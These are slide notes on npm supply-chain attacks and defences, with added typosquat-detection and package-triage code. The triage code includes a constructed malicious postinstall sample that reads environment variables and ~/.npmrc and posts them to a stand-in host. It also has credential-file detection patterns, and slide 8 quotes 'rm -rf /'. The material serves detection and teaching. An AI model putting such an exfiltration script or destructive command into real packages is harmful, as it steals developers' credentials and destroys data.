2. What is npm?
● Package manager for the JavaScript programming language
● Encourages solving problems with small, single-purpose modules
● Modules are composed together for reuse and efficiency (similar to libraries in other languages)
● Used by Angular, React and Ionic for distribution
4. Dependency graph of the top 100 npm packages
● What seems to be the strength of such a huge community also happens to be its weakness (npm, RubyGems)
● Difficult to maintain
● Code cleanup is a problem
5. Most of the code is not your code
● create-react-app downloads 1,839 files, nearly 531 MB in size
6. For the bravehearts who look inside, this is what they find
● npx bitandbang
● yummy.js - Express (deprecated)
● Node.js - Babel (deprecated)
8. What makes modules malicious?
● Upon requiring it, the module could gather information from your system or network and send it out to a third party.
● Upon installing it, the module could have an install phase (a preinstall, install or postinstall script) that runs destructive commands, for example: rm -rf /
10. Attack vectors
Attack surface: basically any open repository
Attack methods
● Typosquatting: publish a package whose name is a near-misspelling of a popular one
● Social engineering: locate a package that others rely on and simply ask the maintainer to hand over the project
● Abuse npm's ability to run preinstall or postinstall scripts (they run on every install unless --ignore-scripts is used)
● The malicious packages were listed to "depend" on the legitimate counterparts, so the correct package would eventually be installed and the victim's code kept working
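As an added example (not from the original slides), a typosquat check you can run over a project's dependencies before installing. The list of "popular" names and the sample package.json below are constructed for the demo; the two rules it applies are the ones the typosquatting cases above rely on: a name within one edit (insert, delete, substitute or swap two adjacent letters) of a well-known package, or a name that differs from it only in punctuation or case.

```javascript
// Added example: flag dependency names that look like typosquats of
// well-known packages. POPULAR and samplePackageJson are constructed here.
const POPULAR = ['lodash', 'express', 'react', 'cross-env', 'babel-cli', 'event-stream', 'left-pad'];

// Damerau-Levenshtein (optimal string alignment) distance: insertion,
// deletion, substitution and swapping two adjacent characters each cost 1.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // adjacent transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Collapse the variations npm users most often mistype: case and the
// punctuation separating words (cross-env vs crossenv vs cross_env).
function normalize(name) {
  return name.toLowerCase().replace(/[-_.]/g, '');
}

// dependencies: the "dependencies" object of a package.json.
// Returns one finding per (name, lookalike) pair; an exact match to a
// popular name is the legitimate package and is never reported.
function typosquatCandidates(dependencies, popular = POPULAR) {
  const findings = [];
  for (const name of Object.keys(dependencies)) {
    if (popular.includes(name)) continue;
    for (const p of popular) {
      let reason = null;
      if (normalize(name) === normalize(p)) reason = 'punctuation/case variant';
      // Distance 1 is only meaningful for names long enough that a one-letter
      // difference is unlikely to be a different, legitimate package.
      else if (p.length >= 4 && editDistance(name, p) <= 1) reason = 'edit distance 1';
      if (reason) findings.push({ name, lookalike: p, reason });
    }
  }
  return findings;
}

// Constructed sample: two legitimate dependencies and three lookalikes.
const samplePackageJson = {
  dependencies: {
    express: '^4.17.1',   // legitimate
    cross_env: '^5.0.0',  // underscore instead of hyphen
    lodsah: '^4.17.0',    // two adjacent letters swapped
    expres: '^4.0.0',     // one letter dropped
    'left-pad': '^1.3.0', // legitimate
  },
};

console.log(typosquatCandidates(samplePackageJson.dependencies));
```

Run it against a real project by replacing `samplePackageJson` with `require('./package.json')`; anything it reports deserves a look at the registry page before `npm install` runs.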
14. Case of mr_robot
● The shrugging-logging package claims that it adds the ASCII shrug, ¯\_(ツ)_/¯, to log messages.
But it also includes a nasty postinstall script which adds the package's author, mr-robot, to every npm package owned by the person who ran npm install.
Source code
15. Case study
● event-stream (November 2018)
● electron-native-notify (June 2019)
● left-pad (eleven lines of destruction)
17. How can we detect?
Look for the following traits:
● Obfuscation
● Reading of sensitive information (environment, credentials, key files)
● Exfiltration of information to a remote host
● Remote code execution
● Typosquatting (a red flag in itself)
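As an added example (not from the original slides), a static triage pass that looks for the first four traits above in an unpacked package and ties them to its install hooks, which is the pattern behind the postinstall cases on the previous slides. The package under test is constructed for the demo (the host `collector.example` is a reserved example name, not a real endpoint); the regexes are indicators to prioritise a manual review, not proof of malice, since a legitimate build tool may spawn processes and a legitimate client may call `https.request`.

```javascript
// Added example: triage a package's files for the traits listed on the slide.
// SAMPLE_PACKAGE is constructed; no real package or host is referenced.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators per trait. Any single hit is weak evidence; several traits
// co-occurring in code that runs at install time is what should stop a review.
const TRAITS = {
  obfuscation: [/\beval\s*\(/, /new\s+Function\s*\(/, /String\.fromCharCode/,
                /(?:\\x[0-9a-f]{2}){6,}/i, /Buffer\.from\([^)]*['"]base64['"]\)/, /\batob\s*\(/],
  'sensitive-read': [/process\.env\b/, /\.npmrc\b/, /\.ssh\b/, /id_rsa/, /os\.homedir\(\)/,
                     /os\.networkInterfaces\(\)/, /\/etc\/passwd/],
  exfiltration: [/require\(\s*['"]https?['"]\s*\)/, /\.request\s*\(/, /\bfetch\s*\(/,
                 /require\(\s*['"](?:net|dgram|dns)['"]\s*\)/],
  'remote-exec': [/require\(\s*['"]child_process['"]\s*\)/, /\b(?:exec|execSync|spawn|spawnSync)\s*\(/],
};

// Returns the sorted list of trait names that match somewhere in `code`.
function scanSource(code) {
  return Object.entries(TRAITS)
    .filter(([, patterns]) => patterns.some((re) => re.test(code)))
    .map(([trait]) => trait)
    .sort();
}

// Lifecycle scripts npm runs automatically during `npm install`.
function installHooks(pkg) {
  const hooks = {};
  for (const h of INSTALL_HOOKS) if (pkg.scripts && pkg.scripts[h]) hooks[h] = pkg.scripts[h];
  return hooks;
}

// files: { relativePath: contents }, as obtained by unpacking the tarball.
function triagePackage(files) {
  const pkg = JSON.parse(files['package.json']);
  const report = { name: pkg.name, installHooks: installHooks(pkg), findings: {} };
  for (const [file, contents] of Object.entries(files)) {
    if (!file.endsWith('.js')) continue;
    const traits = scanSource(contents);
    if (traits.length) report.findings[file] = traits;
  }
  // High risk: a file referenced by an install hook shows two or more traits.
  // (Inline hooks such as `node -e "..."` would need the hook text scanned too.)
  const hookTargets = Object.values(report.installHooks).join(' ');
  report.highRisk = Object.entries(report.findings).some(
    ([file, traits]) => traits.length >= 2 && hookTargets.includes(file));
  return report;
}

// Constructed sample: a harmless-looking logger whose postinstall script reads
// the environment and ~/.npmrc and posts them to a remote host.
const SAMPLE_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'demo-logger',
    version: '1.0.0',
    scripts: { postinstall: 'node scripts/setup.js' },
  }),
  'index.js': "module.exports = (msg) => console.log(msg + ' (shrug)');",
  'scripts/setup.js': [
    "const https = require('https');",
    "const fs = require('fs'), os = require('os'), path = require('path');",
    "const loot = { env: process.env, npmrc: fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8') };",
    "const req = https.request({ host: 'collector.example', method: 'POST', path: '/c' });",
    "req.end(Buffer.from(JSON.stringify(loot)).toString('base64'));",
  ].join('\n'),
};

console.log(JSON.stringify(triagePackage(SAMPLE_PACKAGE), null, 2));
```

To use it on a real package, run `npm pack <name>` (which downloads without installing or running hooks), extract the tarball, and feed the file map to `triagePackage`.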
18. How can we mitigate?
● Don't copy & paste anything blindly (like this sentence right here)
● npm has new rules for naming packages (new names that differ from an existing package only in punctuation are rejected)
● Use the integrated npm audit
● Snyk.io or greenkeeper.io
● Use strong, unique passwords for your npm account
● The npm shrinkwrap command (lock the exact dependency tree)
● Run installs in Docker
In another study published earlier this year, a security researcher was able to gain direct access to 14% of all npm packages (and indirect access to 54% of packages) by either brute-forcing weak credentials or by reusing passwords discovered from other unrelated breaches, leading to mass password resets across npm.
The impact of hijacked or malicious packages is compounded by how npm is structured. Npm encourages making small packages that aim to solve a single problem. This leads to a network of small packages that each depend on many other packages. In the case of the credential compromise research, the author was able to gain access to some of the most highly depended-upon packages, giving them a much wider reach than they would have otherwise had.
This code could harvest credentials or install back doors and trojan horses.
https://blog.usejournal.com/12-strange-things-that-can-happen-after-installing-an-npm-package-45de7fbf39f0
This activity of finding undetected malicious packages has further confirmed our suspicions of the existence of harmful libraries out in the open, and is only the beginning of our quest to efficiently overturn all stones to reduce potential threats. To do this, we intend to perform more regular, automated, and thorough audits on public packages, then generalize these techniques for other package managers like RubyGems.